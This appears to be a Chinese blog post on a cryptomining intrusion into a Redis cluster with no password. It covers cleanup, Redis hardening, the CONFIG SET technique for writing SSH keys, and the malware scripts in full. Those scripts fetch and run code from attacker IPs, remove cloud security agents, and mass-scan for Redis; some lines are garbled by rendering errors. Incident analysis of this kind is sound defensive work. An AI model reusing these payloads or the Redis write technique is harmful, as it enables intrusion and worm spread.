阿里云ECS-Centos7.9集群部署Redis服务遭木马攻击
阿里云ECS-Centos7.9集群部署Redis服务遭木马攻击
#背景
阿里云ECS-Centos7.9集群:hadoop202,hadoop203,hadoop204
hadoop202启动redis-server服务
redis.conf配置
#bind 127.0.0.1
protected-mode no
#requirepass
hadoop202,hadoop203,hadoop204配置了免密
#遭木马入侵,3台机器
CPU占用高
~/.ssh/authorized_keys遭篡改
crontab任务遭篡改,定时执行/etc/newinit.sh
root操作命令、文件权限被篡改
hadoop204 root登陆出现-bash-4.2$
一、利用redis漏洞侵入,植入木马程序
问题:
1、crontab任务 遭篡改
2、修改crontab任务,无权限
3、~/.ssh/authorized_keys 遭篡改,且root用户无法修改、删除
4、su - root, 出现-bash-4.2$
[root@hadoop202 ~]# crontab -l
*/30 * * * * sh /etc/newinit.sh >/dev/null 2>&1
[root@hadoop202 ~]# crontab /opt/module/crontab/myjobs
/var/spool/cron/#tmp.hadoop202.XXXXEE0z37: 权限不够
[root@hadoop202 .ssh]# cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC3QgqCevA1UIX9jkWJNzaDHmCFQMCVn6DlhT8Tj1CcBLouOPpuBVqGoZem9UT/sdy563H+e1cQD6LRA9lgyBO8VBOuyjlPf/rdYeXZRv9eFZ4ROGCOX/dvNzV9XdEyPX+znEL4AS45ko0obSqNGbserHPcKtXBjjcf9zWtRvBA4lteyXENWeCST61OhVI0K7bNTUHsQhFC0rgiGFqVv+kIwMVauMxeNd5PjsES4C5P9G8Ynligmdxp7LdOFeb5/V/iO8eceQsxLyXVCe2Jue5gaaOIbKy2j2HPxj6qK2BUqlx+dJdat6HE2HyPWDKD5jPyA5RCSs1zphe7BQjH20cX1nyzbhxNNQncs5BfB0kk2Qcb9IS/ofX9p8zIVKLUHMUNC9mKqPljzxH/3wYnOZrgebS4uwfyad+6SQ1oRfs1vWotXxSz1hBjhRPpUqzA7J865AcSOZBaoRsRKZ1BaGMyJyjIfkecFgeDpmbHzOzCjIXAeh20S2wLYZGdrhgVEr0= uc1
二、解决:问题1和问题2。关闭木马程序,删除定时任务
#查看/var/spool/cron/root,查看/etc/newinit.sh =>此脚本: chattr权限修改444,篡改authorized_keys、定时作业,且修改文件扩展属性+iae
cat /var/spool/cron/root
*/30 * * * * sh /etc/newinit.sh >/dev/null 2>&1
#停止crond服务,重要!!!!
systemctl stop crond
systemctl status crond
#定时作业,查看文件扩展属性
[root@hadoop202 cron]# lsattr /var/spool/cron/root
----ia-------e-- /var/spool/cron/root
#chattr,修改权限
chmod 755 /usr/bin/chattr
#定时作业,修改文件扩展属性
chattr -iae /var/spool/cron/root
#定时作业,修改权限,删除
chmod 755 /var/spool/cron/root
rm -f /var/spool/cron/root
#删除/etc/newinit.sh
rm -f /etc/newinit.sh
#配置新的定时任务
lsattr /var/spool/cron/ #虽然没有ia属性
chattr -ia /var/spool/cron/ #仍然这样这行
touch /var/spool/cron/a #可以添加文件了
rm -rf /var/spool/cron/root #可以删除了
crontab /opt/module/crontab/myjobs #可以配置新定时作业了
#总结
增加/var/spool/cron/root文件配置的crontab任务
在/etc/newinit.sh脚本做了几件事情
1)修改一些命令文件的权限,chattr,chmod
2)篡改了authorized_keys文件,覆盖写入=uc1账号
3)修改一些文件的扩展属性,如:hattr +iae /root/.ssh/authorized_keys,不让删除、修改
4)执行curl -fsSL http://195.242.111.238/cleanfda/is.sh | bash 命令
#原因:
利用redis漏洞侵入,植入木马程序
#流程:
redis-cli连接redis-server -> 写入ssh公钥到redis -> 公钥覆盖.ssh/authorized_keys,且修改文件扩展属性+ia
-> .ssh定位集群主机,配置免密登陆
->植入crontab任务,通常是一个.sh脚本,脚本里执行木马程序,挖矿:下载,挂载磁盘,执行任务 -> CPU占用,带宽占用,磁盘占用
->木马程序彼此守护,一个关了,另一个给起起来
->定时反复修改文件、命令权限,文件内容,比如:authorized_keys,chattr,chmod
#注意:
漏洞是根据redis开放的端口入侵的,可以对端口进行关闭操作或者设置可访问的ip地址进行预防。
重启阿里云服务器,redis未启动的情况下,cpu恢复正常。
三、解决:问题3。重新配置ssh,修改文件属性+i
#hadoop202、hadoop203、hadoop204准备好authorized_keys
cd /root/.ssh
chattr +ia authorized_keys
lsattr authorized_keys
四、解决:问题4。hadoop204机器,su - root, 出现-bash-4.2$
#原因:
/root目录下没有.bash_profile 和 .bashrc 文件
#解决:
从hadoop203拷贝一份过去就可以正常登录了
五、其他修改
#修复curl,wget
mv /usr/bin/cd1 /usr/bin/curl
mv /usr/bin/wd1 /usr/bin/wget
#删除redis用户
cat /etc/passwd
userdel -r redis
六、Redis安全漏洞解决
(1)配置redis.conf,需要密码登陆
vim /opt/module/redis-3.2.5/redis.conf
#bind 127.0.0.1
#开启保护模式,bind取消注释,protected-mode yes,才生效
protected-mode no
daemonize yes
#客户端连接redis-server需要密码
requirepass 复杂密码
#注意,bind的含义
#本地机内网公网ip:58.xxx.xx.xx
bind 58.xxx.xx.xx 127.0.0.1
启动报错 Creating Server TCP listening socket 58.xxx.xx.xx:6379: bind: Cannot assign requested address
#原因
bind某些ip后,并不是指定那些ip能访问,而是redis服务只能从指定的ip进行访问。即其他机器访问redis-server,只能从指定的ip访问
#怎样限制访问redis-server的白名单
只能通过配置防火墙、安全组
(2)阿里云安全组配置
6379端口指定授权对象
端口范围 授权对象 描述
目的: 6379/6379 源: 本地机内网公网ip Redis端口配置允许:本地机器公网IP
目的: 6379/6379 源: hadoop203内网ip Redis端口配置允许:hadoop204
目的: 6379/6379 源: hadoop204内网ip Redis端口配置允许:hadoop203
(3)hadoop202启动服务,hadoop203、hadoop204、本地localhost,登陆测试
#本地机器连接redis-server,host配置为hadoop202公网ip
localhost:~ liunian$ redis-cli -h hadoop202公网ip -p 6379 -a 复杂密码
#hadoop202连接redis-server,host配置为hadoop202内网ip
[root@hadoop202 ~]#redis-cli -h hadoop202内网ip -p 6379 -a 复杂密码
#hadoop203连接redis-server,host配置为hadoop202内网ip
[root@hadoop203 ~]#redis-cli -h hadoop202内网ip -p 6379 -a 复杂密码
#hadoop204连接redis-server,host配置为hadoop202内网ip
[root@hadoop204 ~]#redis-cli -h hadoop202内网ip -p 6379 -a 复杂密码
七、redis安全漏洞遭篡改.ssh/authorized_keys具体原因
#生成公钥,存入1.txt
ssh-keygen -t rsa
#将.ssh目录下的公钥文件1.txt 通过redis-cli客户端写入到目标主机缓冲中
cat /root/.ssh/1.txt | ./redis-cli -h 192.168.0.111 -x set xxx
#使用客户端登录目标
./redis-cli -h 192.168.0.111
192.168.0.111:6379>config set dir /root/.ssh #设置存储公钥路径
OK
192.168.0.111:6379>config set dbfilename authorized_keys #设置文件名称
OK
#可以以root用户ssh免密登陆目标主机,控制服务器了
八、Redis安全漏洞影响及加固方法
Redis安全漏洞影响:
redis配置“不限制ip,免密登陆”时,通过配置config dir和config dbfilenamedb,可给目标主机root账户写入ssh公钥文件,直接ssh登陆,控制服务器
数据影响,业务影响
Redis加固方法:
网络访问权限,账户访问权限,两个方面考虑
网络访问权限:1、设置防火墙,限制白名单;2、配置redis.conf加固,注释bind;
账户访问权限:1、配置redis.conf加固,配置requirepass;2、重命名关键命令,flushdb、flushall等设置为空,即禁用该命令
九、附木马程序脚本
#包含2个环节:/etc/newinit.sh 以及 http获取并执行的rs.sh
step1:定时执行脚本/etc/newinit.sh
#!/bin/sh
bbdir="/usr/bin/curl"
bbdira="/usr/bin/cd1"
ccdir="/usr/bin/wget"
ccdira="/usr/bin/wd1"
mv /usr/bin/curl /usr/bin/url
mv /usr/bin/url /usr/bin/cd1
mv /usr/bin/cur /usr/bin/cd1
mv /usr/bin/cdl /usr/bin/cd1
mv /usr/bin/cdt /usr/bin/cd1
mv /usr/bin/wget /usr/bin/get
mv /usr/bin/get /usr/bin/wd1
mv /usr/bin/wge /usr/bin/wd1
mv /usr/bin/wdl /usr/bin/wd1
mv /usr/bin/wdt /usr/bin/wd1
sleep $( seq 3 7 | sort -R | head -n1 )
cd /tmp || cd /var/tmp
sleep 1
mkdir -p .ice-unix/… && chmod -R 777 .ice-unix && cd .ice-unix/…
sleep 1
if [ -f .watch ]; then
rm -rf .watch
exit 0
fi
sleep 1
echo 1 > .watch
sleep 1
ps x | awk ‘!/awk/ && /redisscan|ebscan|redis-cli/ {print $1}’ | xargs kill -9 2>/dev/null
ps x | awk '!/awk/ && /barad_agent|masscan|.sr0|clay|udevs|.sshd|xig/ {print KaTeX parse error: Expected 'EOF', got '}' at position 2: 1}̲' | xargs kill …(command -v apt-get)" ]; then
export DEBIAN_FRONTEND=noninteractive
apt-get update -y --exclude=procps* psmisc*
apt-get install -y debconf-doc
apt-get install -y build-essential
apt-get install -y libpcap0.8-dev libpcap0.8
apt-get install -y libpcap*
apt-get install -y make gcc git
apt-get install -y redis-server
apt-get install -y redis-tools
apt-get install -y redis
apt-get install -y iptables
apt-get install -y masscan
apt-get install -y unhide
fi
if [ -x “$(command -v yum)” ]; then
dnf config-manager --set-enabled PowerTools
dnf config-manager --set-enabled powertools
yum install -y epel-release
yum install -y git iptables make gcc redis libpcap libpcap-devel
yum install -y masscan
fi
sleep 1
echo “Software Installed”
dddir="/usr/sbin/unhide"
$dddir quick |grep PID:|awk ‘{print $4}’|xargs -I % kill -9 % 2>/dev/null
chattr -i /usr/bin/ip6network
chattr -i /usr/bin/kswaped
chattr -i /usr/bin/irqbalanced
chattr -i /usr/bin/rctlcli
chattr -i /usr/bin/systemd-network
chattr -i /usr/bin/pamdicks
echo 1 > /usr/bin/ip6network
echo 2 > /usr/bin/kswaped
echo 3 > /usr/bin/irqbalanced
echo 4 > /usr/bin/rctlcli
echo 5 > /usr/bin/systemd-network
echo 6 > /usr/bin/pamdicks
chattr +i /usr/bin/ip6network
chattr +i /usr/bin/kswaped
chattr +i /usr/bin/irqbalanced
chattr +i /usr/bin/rctlcli
chattr +i /usr/bin/systemd-network
chattr +i /usr/bin/pamdicks
downloads()
{
if [ -f “/usr/bin/curl” ]
then
echo $1,$2
http_code=curl -I -m 10 -o /dev/null -s -w %{http_code} $1
if [ “$http_code” -eq “200” ]
then
curl --connect-timeout 10 --retry 100 $1 > 2 e l i f [ " 2 elif [ " 2elif["http_code" -eq “405” ]
then
curl --connect-timeout 10 --retry 100 $1 > $2
else
curl --connect-timeout 10 --retry 100 $3 > $2
fi
elif [ -f “/usr/bin/cd1” ]
then
http_code = cd1 -I -m 10 -o /dev/null -s -w %{http_code} $1
if [ “$http_code” -eq “200” ]
then
cd1 --connect-timeout 10 --retry 100 $1 > 2 e l i f [ " 2 elif [ " 2elif["http_code" -eq “405” ]
then
cd1 --connect-timeout 10 --retry 100 $1 > $2
else
cd1 --connect-timeout 10 --retry 100 $3 > $2
fi
elif [ -f “/usr/bin/wget” ]
then
wget --timeout=10 --tries=100 -O $2 $1
if [ $? -ne 0 ]
then
wget --timeout=10 --tries=100 -O $2 $3
fi
elif [ -f “/usr/bin/wd1” ]
then
wd1 --timeout=10 --tries=100 -O $2 $1
if [ $? -eq 0 ]
then
wd1 --timeout=10 --tries=100 -O $2 $3
fi
fi
}
if ps aux | grep -i ‘[a]liyun’; then
downloads http://update.aegis.aliyun.com/download/uninstall.sh | bash
downloads http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash
pkill aliyun-service
rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
rm -rf /usr/local/aegis*
systemctl stop aliyun.service
systemctl disable aliyun.service
service bcm-agent stop
yum remove bcm-agent -y
apt-get remove bcm-agent -y
elif ps aux | grep -i ‘[y]unjing’; then
/usr/local/qcloud/stargate/admin/uninstall.sh
/usr/local/qcloud/YunJing/uninst.sh
/usr/local/qcloud/monitor/barad/admin/uninstall.sh
fi
sleep 1
echo “DER Uninstalled”
if ! [ -x “$(command -v masscan)” ]; then
rm -rf /var/lib/apt/lists/*
rm -rf x1.tar.gz
sleep 1
$bbdira -sL -o x1.tar.gz http://195.242.111.238/b2f628fff19fda999999999/1.0.4.tar.gz
sleep 1
[ -f x1.tar.gz ] && tar zxf x1.tar.gz && cd masscan-1.0.4 && make && make install && cd … && rm -rf masscan-1.0.4
echo “Masscan Installed”
fi
echo “Masscan Already Installed”
sleep 3 && rm -rf .watch
if ! ( [ -x /usr/local/bin/pnscan ] || [ -x /usr/bin/pnscan ] ); then
$bbdira -sL -o .x112 http://195.242.111.238/cleanfda/pnscan.tar.gz || $ccdira -q -O .x112 http://195.242.111.238/cleanfda/pnscan.tar.gz
sleep 1
[ -f .x112 ] && tar zxf .x112 && cd pnscan && ./configure && make && make install && cd … && rm -rf pnscan .x112
echo “Pnscan Installed”
fi
echo “Pnscan Already Installed”
$bbdir -fsSL http://195.242.111.238/cleanfda/rs.sh | bash
$bbdira -fsSL http://195.242.111.238/cleanfda/rs.sh | bash
step2:newinit.sh最后获取并执行的脚本,http://195.242.111.238/cleanfda/rs.sh,浏览器可查看
#!/bin/bash
setenforce 0 2>/dev/null
ulimit -u 50000
sleep 1
iptables -I INPUT 1 -p tcp --dport 6379 -j DROP 2>/dev/null
iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT 2>/dev/null
sleep 1
if [ -f “/bin/ps.original” ]
then
ps.original -fe|grep pnscan |grep -v grep
else
ps -fe|grep pnscan |grep -v grep
fi
if [ $? -ne 0 ]
then
rm -rf .dat .shard .ranges .lan 2>/dev/null
sleep 1
echo ‘config set dbfilename “backup.db”’ > .dat
echo ‘save’ >> .dat
echo ‘config set stop-writes-on-bgsave-error no’ >> .dat
echo ‘flushall’ >> .dat
echo ‘set backup1 “\n\n\n*/2 * * * * cd1 -fsSL http://195.58.38.171/cleanfda/init.sh | sh\n\n”’ >> .dat
echo ‘set backup2 “\n\n\n*/3 * * * * wget -q -O- http://195.58.38.171/cleanfda/init.sh | sh\n\n”’ >> .dat
echo ‘set backup3 “\n\n\n*/4 * * * * curl -fsSL http://195.242.111.238/cleanfda/init.sh | sh\n\n”’ >> .dat
echo ‘set backup4 “\n\n\n*/5 * * * * wd1 -q -O- http://195.242.111.238/cleanfda/init.sh | sh\n\n”’ >> .dat
echo ‘config set dir “/var/spool/cron/”’ >> .dat
echo ‘config set dbfilename “root”’ >> .dat
echo ‘save’ >> .dat
echo ‘config set dir “/var/spool/cron/crontabs”’ >> .dat
echo ‘save’ >> .dat
echo ‘flushall’ >> .dat
echo ‘set backup1 “\n\n\n*/2 * * * * root cd1 -fsSL http://195.58.38.171/cleanfda/init.sh | sh\n\n”’ >> .dat
echo ‘set backup2 “\n\n\n*/3 * * * * root wget -q -O- http://195.58.38.171/cleanfda/init.sh | sh\n\n”’ >> .dat
echo ‘set backup3 “\n\n\n*/4 * * * * root curl -fsSL http://195.242.111.238/cleanfda/init.sh | sh\n\n”’ >> .dat
echo ‘set backup4 “\n\n\n*/5 * * * * root wd1 -q -O- http://195.242.111.238/cleanfda/init.sh | sh\n\n”’ >> .dat
echo ‘config set dir “/etc/cron.d/”’ >> .dat
echo ‘config set dbfilename “zzh”’ >> .dat
echo ‘save’ >> .dat
echo ‘config set dir “/etc/”’ >> .dat
echo ‘config set dbfilename “crontab”’ >> .dat
echo ‘save’ >> .dat
sleep 1
pnx=pnscan
[ -x /usr/local/bin/pnscan ] && pnx=/usr/local/bin/pnscan
[ -x /usr/bin/pnscan ] && pnx=/usr/bin/pnscan
for z in $( seq 0 5000 | sort -R ); do
for x in $( echo -e “47\n39\n8\n121\n106\n120\n123\n65\n3\n101\n139\n99\n63\n81\n44\n18\n119\n100\n42\n49\n118\n54\n1\n50\n114\n182\n52\n13\n34\n112\n115\n111\n116\n16\n35\n117\n124\n59\n36\n103\n82\n175\n122\n129\n45\n152\n159\n113\n15\n61\n180\n172\n157\n60\n218\n176\n58\n204\n140\n184\n150\n193\n223\n192\n75\n46\n188\n183\n222\n14\n104\n27\n221\n211\n132\n107\n43\n212\n148\n110\n62\n202\n95\n220\n154\n23\n149\n125\n210\n203\n185\n171\n146\n109\n94\n219\n134” | sort -R ); do
for y in $( seq 0 255 | sort -R ); do
$pnx -t256 -R ‘6f 73 3a 4c 69 6e 75 78’ -W ‘2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a’ x . x. x.y.0.0/16 6379 > .r. x . x. x.y.o
awk '/Linux/ {print $1, KaTeX parse error: Expected 'EOF', got '}' at position 2: 3}̲' .r.x. y . o > . r . y.o > .r. y.o>.r.x.$y.l
while read -r h p; do
cat .dat | redis-cli -h $h -p KaTeX parse error: Expected 'EOF', got '&' at position 9: p --raw &̲ done < .r.x.$y.l
done
done
done
sleep 1
masscan --max-rate 10000 -p6379 --shard $( seq 1 22000 | sort -R | head -n1 )/22000 --exclude 255.255.255.255 0.0.0.0/0 2>/dev/null | awk ‘{print $6, substr($4, 1, length($4)-4)}’ | sort | uniq > .shard
sleep 1
while read -r h p; do
cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
done < .shard
sleep 1
masscan --max-rate 10000 -p6379 192.168.0.0/16 172.16.0.0/16 116.62.0.0/16 116.232.0.0/16 116.128.0.0/16 116.163.0.0/16 2>/dev/null | awk ‘{print $6, substr($4, 1, length($4)-4)}’ | sort | uniq > .ranges
sleep 1
while read -r h p; do
cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
done < .ranges
sleep 1
ip a | grep -oE ‘([0-9]{1,3}.?){4}/[0-9]{2}’ 2>/dev/null | sed ‘s//([0-9]{2})//16/g’ > .inet
sleep 1
masscan --max-rate 10000 -p6379 -iL .inet | awk ‘{print $6, substr($4, 1, length($4)-4)}’ | sort | uniq > .lan
sleep 1
while read -r h p; do
cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
done < .lan
sleep 60
rm -rf .dat .shard .ranges .lan 2>/dev/null
else
echo “root runing…”
fi